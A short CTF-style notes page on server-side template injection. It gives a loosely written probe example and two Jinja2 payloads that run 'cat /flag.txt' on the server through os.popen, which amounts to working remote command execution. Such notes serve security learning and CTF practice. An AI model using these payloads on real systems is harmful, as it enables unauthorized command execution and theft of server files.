SSTI
Injecting templates from web
Eg: Hello {jack} -> Hello {7x7}
From PwnFunction
{{ url_for.__globals__.os.popen('cat /flag.txt').read() }}
From AlvinCydesWeb
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat /flag.txt').read() }}
Last updated
Was this helpful?